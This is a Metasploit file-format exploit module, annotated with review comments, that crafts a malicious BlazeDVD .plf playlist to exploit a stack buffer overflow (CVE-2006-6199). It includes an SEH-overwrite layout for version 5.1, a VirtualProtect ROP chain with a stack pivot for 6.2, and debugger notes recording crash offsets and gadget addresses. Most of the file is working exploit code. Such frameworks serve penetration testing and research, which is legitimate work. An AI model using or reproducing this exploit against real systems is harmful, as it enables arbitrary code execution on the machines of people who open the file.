GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/blazedvd_plf.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
# File-format exploit module for BlazeDVD .plf playlists.
#
# The module only builds the crafted playlist and hands it to
# Msf::Exploit::FILEFORMAT#file_create; the file then has to be opened in
# BlazeDVD on the victim side. Two targets are registered: 5.1, which uses a
# SEH-style overwrite (see 'AllowWin32SEH' below and the debugger notes in
# the =begin block at the end of the file), and 6.2, which uses a ROP chain
# built from EPG.dll / SkinScrollBar.Dll gadgets with a stack pivot prepended
# to the payload.
#
# NOTE(review): 'Name' says "6.1" while the Description and Targets cover
# 5.1 and 6.2 only.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  # Module metadata and options.
  #
  # FILENAME (default 'msf.plf') is the only module-specific option; it is
  # read back in #exploit for the status line and consumed by file_create.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow',
        'Description' => %q{
          This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When
          the application is used to open a specially crafted plf file,
          a buffer is overwritten allowing for the execution of arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Deepak Rathore' # ExploitDB PoC
        ],
        'References' => [
          [ 'CVE', '2006-6199' ],
          [ 'EDB', '32737' ],
          [ 'OSVDB', '30770' ],
          [ 'BID', '35918' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'AllowWin32SEH' => true
        },
        'Payload' => {
          # Space is the per-target room left for payload.encoded; the 5.1
          # layout places it at offset 888 of a 6024-byte buffer.
          'Space' => 750,
          'BadChars' => "\x00\x0a\x1a",
          'DisableNops' => true
        },

        'Platform' => 'win',
        'Targets' => [
          [
            'BlazeDVD 6.2',
            {
              'Author' => [ 'Ken Smith', 'Spencer McIntyre' ],
              'Payload' =>
              {
                # Stackpivot => add esp,0xfffff254
                'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
              }
            }
          ],
          [
            'BlazeDVD 5.1',
            {
              'Author' => 'MC',
              # pop esi / pop ecx / ret in SkinScrollBar.Dll; located with the
              # byte search recorded in the =begin block at the end of the file.
              'Ret' => 0x100101e7,
              'Payload' =>
              {
                'EncoderType' => Msf::Encoder::Type::AlphanumUpper
              }
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2009-08-03',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN, ],
          'SideEffects' => [ SCREEN_EFFECTS, ],
          'Reliability' => UNKNOWN_RELIABILITY,
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
      ]
    )
  end

  # ROP chain for the selected target, packed as little-endian 32-bit words
  # ("V*").
  #
  # Only 'BlazeDVD 6.2' defines gadgets. For any other target.name the local
  # rop_gadgets is never assigned (nil) and the flatten call below raises
  # NoMethodError, so this must only be called for the 6.2 target — which is
  # what #exploit does.
  def rop_chain
    # rop chain generated with mona.py - www.corelan.be
    case target.name
    when 'BlazeDVD 6.2'
      rop_gadgets = [ ]
      # 0x6162e802 RETN (ROP NOP) [EPG.dll]
      # fill(addr, 0..7) on the empty array yields eight copies of the
      # address, i.e. an eight-entry RETN sled ahead of the real chain.
      rop_gadgets.fill(0x6162e802, 0..7)
      rop_gadgets += [
        0x61636758, # POP EAX # RETN [EPG.dll]
        0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
        0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
        0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
        0x61628ea2, # POP EBP # RETN [EPG.dll]
        0x616069a1, # push esp # ret 0x04 [EPG.dll]
        0x61626702, # POP EAX # RETN [EPG.dll]
        0xfffffdff, # Value to negate, will become 0x00000201
        0x61627d9c, # NEG EAX # RETN [EPG.dll]
        0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]
        0x61629938, # POP EAX # RETN [EPG.dll]
        0xffffffc0, # Value to negate, will become 0x00000040
        0x61627d9c, # NEG EAX # RETN [EPG.dll]
        0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]
        0x61612f5a, # POP ECX # RETN [EPG.dll]
        0x100142ab, # &Writable location [SkinScrollBar.Dll]
        0x616313ac, # POP EDI # RETN [EPG.dll]
        0x6162e588, # RETN (ROP NOP) [EPG.dll]
        0x6162d638, # POP EAX # RETN [EPG.dll]
        0x90909090, # nop
        0x61620831, # PUSHAD # RETN [EPG.dll]
      ]
    end
    # 'V*' packs each gadget as an unsigned 32-bit little-endian word.
    return rop_gadgets.flatten.pack("V*")
  end

  # Builds the .plf contents for the selected target and writes the file out
  # through FILEFORMAT#file_create under datastore['FILENAME'].
  #
  # 5.1: a 6024-byte upper-alpha buffer; offset 868 receives a 6-byte short
  #      jump plus 2 filler bytes and target.ret, offset 876 twelve NOPs, and
  #      offset 888 the encoded payload. These offsets line up with the
  #      crash analysis in the =begin block at the end of the file
  #      (control at 868 and 872).
  # 6.2: 260 bytes of alphanumeric filler, the ROP chain from #rop_chain, then
  #      the encoded payload; the stack pivot itself comes from the target's
  #      'PrependEncoder'.
  # There is no else branch; only the two registered targets are handled.
  def exploit
    case target.name
    when 'BlazeDVD 5.1'
      plf = rand_text_alpha_upper(6024)
      plf[868, 8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V')
      plf[876, 12] = make_nops(12)
      plf[888, payload.encoded.length] = payload.encoded
    when 'BlazeDVD 6.2'
      plf = rand_text_alphanumeric(260)
      plf << rop_chain
      plf << payload.encoded
    end

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(plf)
  end
end
=begin
0:000> !exchain
0012f2c8: 31644230
Invalid exception stack at 64423963
0:000> !pattern_offset 6024 0x31644230
[Byakugan] Control of 0x31644230 at offset 872.
0:000> !pattern_offset 6024 0x64423963
[Byakugan] Control of 0x64423963 at offset 868.
0:000> s -b 0x10000000 0x10018000 5e 59 c3
100012cd 5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00 ^Y.V.t$.W..V..<.
100101e7 5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24 ^Y........D$..L$
0:000> u 0x100012cd L3
skinscrollbar!SkinSB_ParentWndProc+0x1fd:
100012cd 5e pop esi
100012ce 59 pop ecx
100012cf c3 ret
=end